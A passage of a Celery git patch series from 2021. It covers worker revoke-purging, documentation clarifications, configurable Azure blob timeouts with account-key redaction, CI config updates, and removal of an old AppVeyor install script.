@@ -601,7 +601,7 @@ def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
super().__init__('celery.chain', (), {'tasks': tasks}, **options
- )
+ )
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
@@ -903,8 +903,8 @@ def from_dict(cls, d, app=None):
def __init__(self, task, it, **options):
super().__init__(self._task_name, (),
- {'task': task, 'it': regen(it)}, immutable=True, **options
- )
+ {'task': task, 'it': regen(it)}, immutable=True, **options
+ )
def apply_async(self, args=None, kwargs=None, **opts):
# need to evaluate generators
@@ -956,9 +956,9 @@ def from_dict(cls, d, app=None):
def __init__(self, task, it, n, **options):
super().__init__('celery.chunks', (),
- {'task': task, 'it': regen(it), 'n': n},
- immutable=True, **options
- )
+ {'task': task, 'it': regen(it), 'n': n},
+ immutable=True, **options
+ )
def __call__(self, **options):
return self.apply_async(**options)
@@ -1054,7 +1054,7 @@ def __init__(self, *tasks, **options):
if not isinstance(tasks, _regen):
tasks = regen(tasks)
super().__init__('celery.group', (), {'tasks': tasks}, **options
- )
+ )
self.subtask_type = 'group'
def __call__(self, *partial_args, **options):
@@ -1350,9 +1350,9 @@ def __init__(self, header, body=None, task='celery.chord',
args = args if args else ()
kwargs = kwargs if kwargs else {'kwargs': {}}
super().__init__(task, args,
- {**kwargs, 'header': _maybe_group(header, app),
- 'body': maybe_signature(body, app=app)}, app=app, **options
- )
+ {**kwargs, 'header': _maybe_group(header, app),
+ 'body': maybe_signature(body, app=app)}, app=app, **options
+ )
self.subtask_type = 'chord'
def __call__(self, body=None, **options):
diff --git a/celery/contrib/rdb.py b/celery/contrib/rdb.py
index 995bec16d19..a34c0b52678 100644
--- a/celery/contrib/rdb.py
+++ b/celery/contrib/rdb.py
@@ -111,7 +111,7 @@ def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT,
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
super().__init__(completekey='tab',
- stdin=self._handle, stdout=self._handle)
+ stdin=self._handle, stdout=self._handle)
def get_avail_port(self, host, port, search_limit=100, skew=+0):
try:
diff --git a/celery/utils/serialization.py b/celery/utils/serialization.py
index 673fdf50913..c03a20f9419 100644
--- a/celery/utils/serialization.py
+++ b/celery/utils/serialization.py
@@ -134,7 +134,7 @@ def __init__(self, exc_module, exc_cls_name, exc_args, text=None):
self.exc_args = safe_exc_args
self.text = text
super().__init__(exc_module, exc_cls_name, safe_exc_args,
- text)
+ text)
def restore(self):
return create_exception_cls(self.exc_cls_name,
From b0ecc35bacd64416093b82cea4a9f150595e5b04 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Oliver=20Nem=C4=8Dek?=
Date: Fri, 1 Oct 2021 12:32:24 +0200
Subject: [PATCH 085/177] Prevent worker from sending expired revoked items
 upon hello command (#6975)
* Prevent worker from sending expired revoked items upon hello command.
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/worker/control.py | 2 ++
t/unit/worker/test_control.py | 19 ++++++++++++++++++-
2 files changed, 20 insertions(+), 1 deletion(-)
diff --git a/celery/worker/control.py b/celery/worker/control.py
index 2518948f1b1..197d0c4d617 100644
--- a/celery/worker/control.py
+++ b/celery/worker/control.py
@@ -310,6 +310,8 @@ def hello(state, from_node, revoked=None, **kwargs):
logger.info('sync with %s', from_node)
if revoked:
worker_state.revoked.update(revoked)
+ # Do not send expired items to the other worker.
+ worker_state.revoked.purge()
return {
'revoked': worker_state.revoked._data,
'clock': state.app.clock.forward(),
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index 8e1e02d64df..0d53d65e3bc 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -1,5 +1,6 @@
import socket
import sys
+import time
from collections import defaultdict
from datetime import datetime, timedelta
from queue import Queue as FastQueue
@@ -16,7 +17,7 @@
from celery.worker import state as worker_state
from celery.worker.pidbox import Pidbox, gPidbox
from celery.worker.request import Request
-from celery.worker.state import revoked
+from celery.worker.state import REVOKE_EXPIRES, revoked
hostname = socket.gethostname()
@@ -192,6 +193,22 @@ def test_hello(self):
finally:
worker_state.revoked.discard('revoked1')
+ def test_hello_does_not_send_expired_revoked_items(self):
+ consumer = Consumer(self.app)
+ panel = self.create_panel(consumer=consumer)
+ panel.state.app.clock.value = 313
+ panel.state.hostname = 'elaine@vandelay.com'
+ # Add an expired revoked item to the revoked set.
+ worker_state.revoked.add(
+ 'expired_in_past',
+ now=time.monotonic() - REVOKE_EXPIRES - 1
+ )
+ x = panel.handle('hello', {
+ 'from_node': 'george@vandelay.com',
+ 'revoked': {'1234', '4567', '891'}
+ })
+ assert 'expired_in_past' not in x['revoked']
+
def test_conf(self):
consumer = Consumer(self.app)
panel = self.create_panel(consumer=consumer)
From cba7d62475ae980c19dbd83ef52529d804e3c9bf Mon Sep 17 00:00:00 2001
From: Pedram Ashofteh Ardakani
Date: Sun, 3 Oct 2021 12:52:25 +0330
Subject: [PATCH 086/177] docs: clarify the 'keeping results' section (#6979)
* docs: clarify the 'keeping results' section
It might seem obvious for experienced users, but new users could get
confused with where to add the 'backend' argument. Should it be passed
as an argument when invoking celery? In a separate configuration file?
This leads to opening up many tabs and looking for a clue which in
turn, might frustrate a newbie.
So, the manual could simply save a lot of headache with explicitly
stating: you could modify this line in the very first 'tasks.py' file
you are trying to work with!
This commit fixes that.
* docs: keeping results section, reload updated 'app'
A simple '>>> from tasks import app' might not consider the updates we
made in a running session for different versions of python (if it
works at all). So, the new users should be reminded to close and
reopen the session to avoid confusion.
* Update docs/getting-started/first-steps-with-celery.rst
Co-authored-by: Omer Katz
Co-authored-by: Omer Katz
---
docs/getting-started/first-steps-with-celery.rst | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/docs/getting-started/first-steps-with-celery.rst b/docs/getting-started/first-steps-with-celery.rst
index 799db7200d7..a87af8f7201 100644
--- a/docs/getting-started/first-steps-with-celery.rst
+++ b/docs/getting-started/first-steps-with-celery.rst
@@ -229,7 +229,8 @@ and -- or you can define your own.
For this example we use the `rpc` result backend, that sends states
back as transient messages. The backend is specified via the ``backend`` argument to
:class:`@Celery`, (or via the :setting:`result_backend` setting if
-you choose to use a configuration module):
+you choose to use a configuration module). So, you can modify this line in the `tasks.py`
+file to enable the `rpc://` backend:
.. code-block:: python
@@ -244,12 +245,13 @@ the message broker (a popular combination):
To read more about result backends please see :ref:`task-result-backends`.
-Now with the result backend configured, let's call the task again.
-This time you'll hold on to the :class:`~@AsyncResult` instance returned
-when you call a task:
+Now with the result backend configured, close the current python session and import the
+``tasks`` module again to put the changes into effect. This time you'll hold on to the
+:class:`~@AsyncResult` instance returned when you call a task:
.. code-block:: pycon
+ >>> from tasks import add # close and reopen to get updated 'app'
>>> result = add.delay(4, 4)
The :meth:`~@AsyncResult.ready` method returns whether the task
From ffb0d3d54884aaae140a20879a58449b27946f49 Mon Sep 17 00:00:00 2001
From: Jens Timmerman
Date: Mon, 4 Oct 2021 17:12:20 +0200
Subject: [PATCH 087/177] Update deprecated task module removal in 5.0
documentation (#6981)
* Update whatsnew-5.0.rst
* update 5.0 deprecation documentation to reflect reality
* Update whatsnew-5.1.rst
* Update whatsnew-5.0.rst
* Update whatsnew-5.1.rst
---
docs/history/whatsnew-5.0.rst | 6 ++++++
docs/internals/deprecation.rst | 13 ++++++++++++-
docs/whatsnew-5.1.rst | 7 +++++++
3 files changed, 25 insertions(+), 1 deletion(-)
diff --git a/docs/history/whatsnew-5.0.rst b/docs/history/whatsnew-5.0.rst
index d2e2df90e62..bb27b59cf32 100644
--- a/docs/history/whatsnew-5.0.rst
+++ b/docs/history/whatsnew-5.0.rst
@@ -262,6 +262,12 @@ you should import `kombu.utils.encoding` instead.
If you were using the `celery.task` module before, you should import directly
from the `celery` module instead.
+If you were using `from celery.task import Task` you should use
+`from celery import Task` instead.
+
+If you were using the `celery.task` decorator you should use
+`celery.shared_task` instead.
+
.. _new_command_line_interface:
New Command Line Interface
diff --git a/docs/internals/deprecation.rst b/docs/internals/deprecation.rst
index 222dd6644d9..23d03ad36f7 100644
--- a/docs/internals/deprecation.rst
+++ b/docs/internals/deprecation.rst
@@ -34,7 +34,7 @@ Compat Task Modules
from celery import task
-- Module ``celery.task`` *may* be removed (not decided)
+- Module ``celery.task`` will be removed
This means you should change:
@@ -44,10 +44,21 @@ Compat Task Modules
into:
+ .. code-block:: python
+
+ from celery import shared_task
+
+ -- and:
.. code-block:: python
from celery import task
+ into:
+
+ .. code-block:: python
+
+ from celery import shared_task
+
-- and:
.. code-block:: python
diff --git a/docs/whatsnew-5.1.rst b/docs/whatsnew-5.1.rst
index bdd35f0773c..a1c7416cdda 100644
--- a/docs/whatsnew-5.1.rst
+++ b/docs/whatsnew-5.1.rst
@@ -290,6 +290,13 @@ you should import `kombu.utils.encoding` instead.
If you were using the `celery.task` module before, you should import directly
from the `celery` module instead.
+If you were using `from celery.task import Task` you should use
+`from celery import Task` instead.
+
+If you were using the `celery.task` decorator you should use
+`celery.shared_task` instead.
+
+
`azure-servicebus` 7.0.0 is now required
----------------------------------------
From 9b713692e18bc257a2433a4a2d594bc928dcaa91 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 4 Oct 2021 16:35:59 +0000
Subject: [PATCH 088/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.28.0 → v2.29.0](https://github.com/asottile/pyupgrade/compare/v2.28.0...v2.29.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 83eaf953100..449a5a88c7b 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.28.0
+ rev: v2.29.0
hooks:
- id: pyupgrade
args: ["--py37-plus"]
From d5380fa02d1ef038b99105dacd9a281f19d74575 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 5 Oct 2021 13:54:43 +0600
Subject: [PATCH 089/177] try python 3.10 GA
---
.github/workflows/python-package.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 4136c4eff62..b4076bf6429 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,7 +24,7 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.2', 'pypy-3.7']
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
steps:
From ef545e3d222fd5ac955077aa44801f9b68002e37 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 5 Oct 2021 14:37:06 +0600
Subject: [PATCH 090/177] mention python 3.10 on readme
---
README.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.rst b/README.rst
index a2ae072e6fd..9f9ccaaf47c 100644
--- a/README.rst
+++ b/README.rst
@@ -59,7 +59,7 @@ What do I need?
Celery version 5.2.0rc1 runs on,
-- Python (3.7, 3.8, 3.9)
+- Python (3.7, 3.8, 3.9, 3.10)
- PyPy3.7 (7.3+)
From d3773221fcf38de29b3cbc17abe2deafb90895f0 Mon Sep 17 00:00:00 2001
From: Marat Idrisov
Date: Mon, 4 Oct 2021 22:40:52 +0300
Subject: [PATCH 091/177] Documenting the default consumer_timeout value for
rabbitmq >= 3.8.15
Related to issue #6760
---
docs/userguide/calling.rst | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
diff --git a/docs/userguide/calling.rst b/docs/userguide/calling.rst
index efeb1bb6c13..8bfe52feef4 100644
--- a/docs/userguide/calling.rst
+++ b/docs/userguide/calling.rst
@@ -252,6 +252,31 @@ and timezone information):
>>> tomorrow = datetime.utcnow() + timedelta(days=1)
>>> add.apply_async((2, 2), eta=tomorrow)
+.. warning::
+
+ When using RabbitMQ as a message broker when specifying a ``countdown``
+ over 15 minutes, you may encounter the problem that the worker terminates
+ with an :exc:`~amqp.exceptions.PreconditionFailed` error will be raised:
+
+ .. code-block:: pycon
+
+ amqp.exceptions.PreconditionFailed: (0, 0): (406) PRECONDITION_FAILED - consumer ack timed out on channel
+
+ In RabbitMQ since version 3.8.15 the default value for
+ ``consumer_timeout`` is 15 minutes.
+ Since version 3.8.17 it was increased to 30 minutes. If a consumer does
+ not ack its delivery for more than the timeout value, its channel will be
+ closed with a ``PRECONDITION_FAILED`` channel exception.
+ See `Delivery Acknowledgement Timeout`_ for more information.
+
+ To solve the problem, in RabbitMQ configuration file ``rabbitmq.conf`` you
+ should specify the ``consumer_timeout`` parameter greater than or equal to
+ your countdown value. For example, you can specify a very large value
+ of ``consumer_timeout = 31622400000``, which is equal to 1 year
+ in milliseconds, to avoid problems in the future.
+
+.. _`Delivery Acknowledgement Timeout`: https://www.rabbitmq.com/consumers.html#acknowledgement-timeout
+
.. _calling-expiration:
Expiration
From 49452916f94d5ec60af246cea600855e6d976b48 Mon Sep 17 00:00:00 2001
From: Tomasz Kluczkowski
Date: Wed, 6 Oct 2021 10:35:56 +0100
Subject: [PATCH 092/177] Azure blockblob backend parametrized connection/read
timeouts (#6978)
* Initial hardcoded (sorry) change to the celery azure block blob backend.
This is required to check if this change has any influence.
If it does I will make it proper config option in celery itself.
* Add sensible defaults for azure block blob backend.
The problem we hit in production is on certain network errors (suspect partitioning) the client becomes stuck on the default read timeout for an ssl socket
which in azure is defined in `/azure/storage/blob/_shared/constants.py` as READ_TIMEOUT = 80000 (seconds) for python versions > 3.5.
This means that for those python versions the operation is stuck for 55.555[...] days until it times out which is obviously not ideal :).
This sets the timeouts at 20s for connection (which is the current default) and 120s for all python versions, which with modern connections is sufficient.
If we think it should be higher - I can increase it but we definitely should give the user an option to set their own timeouts based on file sizes and bandwidths they are operating on.
* Update docs a bit.
* Update docs/userguide/configuration.rst
Co-authored-by: Omer Katz
* Add test confirming azure blob client is configured correctly based on values supplied from configuration dictionary.
Co-authored-by: tomaszkluczkowski
Co-authored-by: Asif Saif Uddin
Co-authored-by: Omer Katz
---
celery/app/defaults.py | 2 ++
celery/backends/azureblockblob.py | 10 ++++++-
docs/userguide/configuration.rst | 18 +++++++++++++
t/unit/backends/test_azureblockblob.py | 36 ++++++++++++++++++++++++++
4 files changed, 65 insertions(+), 1 deletion(-)
diff --git a/celery/app/defaults.py b/celery/app/defaults.py
index 70f4fb8b0ac..596c750f2b5 100644
--- a/celery/app/defaults.py
+++ b/celery/app/defaults.py
@@ -133,6 +133,8 @@ def __repr__(self):
retry_increment_base=Option(2, type='int'),
retry_max_attempts=Option(3, type='int'),
base_path=Option('', type='string'),
+ connection_timeout=Option(20, type='int'),
+ read_timeout=Option(120, type='int'),
),
control=Namespace(
queue_ttl=Option(300.0, type='float'),
diff --git a/celery/backends/azureblockblob.py b/celery/backends/azureblockblob.py
index 972baaf73e9..4b263a5cbff 100644
--- a/celery/backends/azureblockblob.py
+++ b/celery/backends/azureblockblob.py
@@ -44,6 +44,10 @@ def __init__(self,
conf["azureblockblob_container_name"])
self.base_path = conf.get('azureblockblob_base_path', '')
+ self._connection_timeout = conf.get(
+ 'azureblockblob_connection_timeout', 20
+ )
+ self._read_timeout = conf.get('azureblockblob_read_timeout', 120)
@classmethod
def _parse_url(cls, url, prefix="azureblockblob://"):
@@ -61,7 +65,11 @@ def _blob_service_client(self):
the container is created if it doesn't yet exist.
"""
- client = BlobServiceClient.from_connection_string(self._connection_string)
+ client = BlobServiceClient.from_connection_string(
+ self._connection_string,
+ connection_timeout=self._connection_timeout,
+ read_timeout=self._read_timeout
+ )
try:
client.create_container(name=self._container_name)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index f78388fd7b7..d2291c3535a 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -1599,6 +1599,24 @@ Default: 3.
The maximum number of retry attempts.
+.. setting:: azureblockblob_connection_timeout
+
+``azureblockblob_connection_timeout``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: 20.
+
+Timeout in seconds for establishing the azure block blob connection.
+
+.. setting:: azureblockblob_read_timeout
+
+``azureblockblob_read_timeout``
+~~~~~~~~~~~~~~~~~~~~
+
+Default: 120.
+
+Timeout in seconds for reading of an azure block blob.
+
.. _conf-elasticsearch-result-backend:
Elasticsearch backend settings
diff --git a/t/unit/backends/test_azureblockblob.py b/t/unit/backends/test_azureblockblob.py
index 7c80400cc1e..ec6dac9973d 100644
--- a/t/unit/backends/test_azureblockblob.py
+++ b/t/unit/backends/test_azureblockblob.py
@@ -61,6 +61,42 @@ def test_create_client(self, mock_blob_service_factory):
assert backend._blob_service_client is not None
assert mock_blob_service_client_instance.create_container.call_count == 1
+ @patch(MODULE_TO_MOCK + ".BlobServiceClient")
+ def test_configure_client(self, mock_blob_service_factory):
+
+ connection_timeout = 3
+ read_timeout = 11
+ self.app.conf.update(
+ {
+ 'azureblockblob_connection_timeout': connection_timeout,
+ 'azureblockblob_read_timeout': read_timeout,
+ }
+ )
+
+ mock_blob_service_client_instance = Mock()
+ mock_blob_service_factory.from_connection_string.return_value = (
+ mock_blob_service_client_instance
+ )
+
+ base_url = "azureblockblob://"
+ connection_string = "connection_string"
+ backend = AzureBlockBlobBackend(
+ app=self.app, url=f'{base_url}{connection_string}'
+ )
+
+ client = backend._blob_service_client
+ assert client is mock_blob_service_client_instance
+
+ (
+ mock_blob_service_factory
+ .from_connection_string
+ .assert_called_once_with(
+ connection_string,
+ connection_timeout=connection_timeout,
+ read_timeout=read_timeout
+ )
+ )
+
@patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
def test_get(self, mock_client, base_path):
self.backend.base_path = base_path
From fc689bde77415a04740501a9ff097a15e0529f17 Mon Sep 17 00:00:00 2001
From: Tomasz-Kluczkowski
Date: Sat, 9 Oct 2021 15:44:34 +0100
Subject: [PATCH 093/177] Add as_uri method to azure block blob backend.
It is strange that the azure block blob backend shows no URI during celery boot.
This should fix it.
---
celery/backends/azureblockblob.py | 23 +++++++++++++++++++++-
t/unit/backends/test_azureblockblob.py | 27 ++++++++++++++++++++++++++
2 files changed, 49 insertions(+), 1 deletion(-)
diff --git a/celery/backends/azureblockblob.py b/celery/backends/azureblockblob.py
index 4b263a5cbff..e7d2c231808 100644
--- a/celery/backends/azureblockblob.py
+++ b/celery/backends/azureblockblob.py
@@ -18,6 +18,7 @@
__all__ = ("AzureBlockBlobBackend",)
LOGGER = get_logger(__name__)
+AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://'
class AzureBlockBlobBackend(KeyValueStoreBackend):
@@ -50,7 +51,7 @@ def __init__(self,
self._read_timeout = conf.get('azureblockblob_read_timeout', 120)
@classmethod
- def _parse_url(cls, url, prefix="azureblockblob://"):
+ def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX):
connection_string = url[len(prefix):]
if not connection_string:
raise ImproperlyConfigured("Invalid URL")
@@ -143,3 +144,23 @@ def delete(self, key):
)
blob_client.delete_blob()
+
+ def as_uri(self, include_password=False):
+ if include_password:
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{self._connection_string}'
+ )
+
+ connection_string_parts = self._connection_string.split(';')
+ account_key_prefix = 'AccountKey='
+ redacted_connection_string_parts = [
+ f'{account_key_prefix}**' if part.startswith(account_key_prefix)
+ else part
+ for part in connection_string_parts
+ ]
+
+ return (
+ f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}'
+ f'{";".join(redacted_connection_string_parts)}'
+ )
diff --git a/t/unit/backends/test_azureblockblob.py b/t/unit/backends/test_azureblockblob.py
index ec6dac9973d..5329140627f 100644
--- a/t/unit/backends/test_azureblockblob.py
+++ b/t/unit/backends/test_azureblockblob.py
@@ -165,3 +165,30 @@ def test_base_path_conf_default(self):
url=self.url
)
assert backend.base_path == ''
+
+
+class test_as_uri:
+ def setup(self):
+ self.url = (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=account_key;"
+ "EndpointSuffix=suffix"
+ )
+ self.backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+
+ def test_as_uri_include_password(self):
+ assert self.backend.as_uri(include_password=True) == self.url
+
+ def test_as_uri_exclude_password(self):
+ assert self.backend.as_uri(include_password=False) == (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=**;"
+ "EndpointSuffix=suffix"
+ )
From a22dbaeafd2eb195983588cf22ee1a98721a2c28 Mon Sep 17 00:00:00 2001
From: MelnykR
Date: Sun, 10 Oct 2021 12:20:47 +0300
Subject: [PATCH 094/177] Add possibility to override backend implementation
with celeryconfig (#6879)
* Parse override_backend field in Loader config
* cover override_backends feature with tests
* add docs
---
celery/loaders/base.py | 2 ++
docs/userguide/configuration.rst | 22 ++++++++++++++++++++++
t/unit/app/test_loaders.py | 5 ++++-
3 files changed, 28 insertions(+), 1 deletion(-)
diff --git a/celery/loaders/base.py b/celery/loaders/base.py
index ad45bad19e3..8cc15de8f8a 100644
--- a/celery/loaders/base.py
+++ b/celery/loaders/base.py
@@ -126,6 +126,8 @@ def config_from_object(self, obj, silent=False):
return False
raise
self._conf = force_mapping(obj)
+ if self._conf.get('override_backends') is not None:
+ self.override_backends = self._conf['override_backends']
return True
def _smart_import(self, path, imp=None):
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index d2291c3535a..0d7d7554d0a 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -855,6 +855,28 @@ Default interval for retrying chord tasks.
.. _conf-database-result-backend:
+
+.. setting:: override_backends
+
+``override_backends``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: Disabled by default.
+
+Path to class that implements backend.
+
+Allows to override backend implementation.
+This can be useful if you need to store additional metadata about executed tasks,
+override retry policies, etc.
+
+Example:
+
+.. code-block:: python
+
+ override_backends = {"db": "custom_module.backend.class"}
+
+
+
Database backend settings
-------------------------
diff --git a/t/unit/app/test_loaders.py b/t/unit/app/test_loaders.py
index 97becf0e397..9a411e963a4 100644
--- a/t/unit/app/test_loaders.py
+++ b/t/unit/app/test_loaders.py
@@ -69,9 +69,12 @@ def test_init_worker_process(self):
m.assert_called_with()
def test_config_from_object_module(self):
- self.loader.import_from_cwd = Mock()
+ self.loader.import_from_cwd = Mock(return_value={
+ "override_backends": {"db": "custom.backend.module"},
+ })
self.loader.config_from_object('module_name')
self.loader.import_from_cwd.assert_called_with('module_name')
+ assert self.loader.override_backends == {"db": "custom.backend.module"}
def test_conf_property(self):
assert self.loader.conf['foo'] == 'bar'
From 50b0f6bd0784ce2fd160f6b9186de4a0e1b5d4d3 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 11 Oct 2021 16:36:54 +0000
Subject: [PATCH 095/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/PyCQA/flake8: 3.9.2 → 4.0.1](https://github.com/PyCQA/flake8/compare/3.9.2...4.0.1)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 449a5a88c7b..e02add6be46 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -6,7 +6,7 @@ repos:
args: ["--py37-plus"]
- repo: https://github.com/PyCQA/flake8
- rev: 3.9.2
+ rev: 4.0.1
hooks:
- id: flake8
From c735e152d124a52be5d547b6b36d862485d388e5 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 18 Oct 2021 14:31:26 +0600
Subject: [PATCH 096/177] try to fix deprecation warning
WARNING: PendingDeprecationWarning
Support of old-style PyPy config keys will be removed in tox-gh-actions v3.
Please use "pypy-2" and "pypy-3" instead of "pypy2" and "pypy3".
Example of tox.ini:
[gh-actions]
python =
pypy-2: pypy2
pypy-3: pypy3
# The followings won't work with tox-gh-actions v3
# pypy2: pypy2
# pypy3: pypy3
---
tox.ini | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tox.ini b/tox.ini
index 64213027b9c..39cfcb5e198 100644
--- a/tox.ini
+++ b/tox.ini
@@ -17,7 +17,7 @@ python =
3.8: 3.8-unit
3.9: 3.9-unit
3.10: 3.10-unit
- pypy3: pypy3-unit
+ pypy-3: pypy3-unit
[testenv]
sitepackages = False
From 89815ca617217dc2c2fb896848ee877aec0bc69e Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 25 Oct 2021 16:35:50 +0000
Subject: [PATCH 097/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/yesqa: v1.2.3 → v1.3.0](https://github.com/asottile/yesqa/compare/v1.2.3...v1.3.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index e02add6be46..5897b1fd242 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -11,7 +11,7 @@ repos:
- id: flake8
- repo: https://github.com/asottile/yesqa
- rev: v1.2.3
+ rev: v1.3.0
hooks:
- id: yesqa
From c9a82a3a8cb2eba36ecddc531f27f63d219fb356 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:40:05 +0600
Subject: [PATCH 098/177] not needed anymore
---
extra/appveyor/install.ps1 | 85 --------------------------------------
1 file changed, 85 deletions(-)
delete mode 100644 extra/appveyor/install.ps1
diff --git a/extra/appveyor/install.ps1 b/extra/appveyor/install.ps1
deleted file mode 100644
index 7166f65e37a..00000000000
--- a/extra/appveyor/install.ps1
+++ /dev/null
@@ -1,85 +0,0 @@
-# Sample script to install Python and pip under Windows
-# Authors: Olivier Grisel and Kyle Kastner
-# License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-
-$BASE_URL = "https://www.python.org/ftp/python/"
-$GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
-$GET_PIP_PATH = "C:\get-pip.py"
-
-
-function DownloadPython ($python_version, $platform_suffix) {
- $webclient = New-Object System.Net.WebClient
- $filename = "python-" + $python_version + $platform_suffix + ".msi"
- $url = $BASE_URL + $python_version + "/" + $filename
-
- $basedir = $pwd.Path + "\"
- $filepath = $basedir + $filename
- if (Test-Path $filename) {
- Write-Host "Reusing" $filepath
- return $filepath
- }
-
- # Download and retry up to 5 times in case of network transient errors.
- Write-Host "Downloading" $filename "from" $url
- $retry_attempts = 3
- for($i=0; $i -lt $retry_attempts; $i++){
- try {
- $webclient.DownloadFile($url, $filepath)
- break
- }
- Catch [Exception]{
- Start-Sleep 1
- }
- }
- Write-Host "File saved at" $filepath
- return $filepath
-}
-
-
-function InstallPython ($python_version, $architecture, $python_home) {
- Write-Host "Installing Python" $python_version "for" $architecture "bit architecture to" $python_home
- if (Test-Path $python_home) {
- Write-Host $python_home "already exists, skipping."
- return $false
- }
- if ($architecture -eq "32") {
- $platform_suffix = ""
- } else {
- $platform_suffix = ".amd64"
- }
- $filepath = DownloadPython $python_version $platform_suffix
- Write-Host "Installing" $filepath "to" $python_home
- $args = "/qn /i $filepath TARGETDIR=$python_home"
- Write-Host "msiexec.exe" $args
- Start-Process -FilePath "msiexec.exe" -ArgumentList $args -Wait -Passthru
- Write-Host "Python $python_version ($architecture) installation complete"
- return $true
-}
-
-
-function InstallPip ($python_home) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- $python_path = $python_home + "/python.exe"
- if (-not(Test-Path $pip_path)) {
- Write-Host "Installing pip..."
- $webclient = New-Object System.Net.WebClient
- $webclient.DownloadFile($GET_PIP_URL, $GET_PIP_PATH)
- Write-Host "Executing:" $python_path $GET_PIP_PATH
- Start-Process -FilePath "$python_path" -ArgumentList "$GET_PIP_PATH" -Wait -Passthru
- } else {
- Write-Host "pip already installed."
- }
-}
-
-function InstallPackage ($python_home, $pkg) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- & $pip_path install $pkg
-}
-
-function main () {
- InstallPython $env:PYTHON_VERSION $env:PYTHON_ARCH $env:PYTHON
- InstallPip $env:PYTHON
- InstallPackage $env:PYTHON wheel
-}
-
-main
From 7b18240c76500e94c78325b6b2deb4469937b307 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:40:29 +0600
Subject: [PATCH 099/177] not needed anymore
---
extra/appveyor/run_with_compiler.cmd | 47 ----------------------------
1 file changed, 47 deletions(-)
delete mode 100644 extra/appveyor/run_with_compiler.cmd
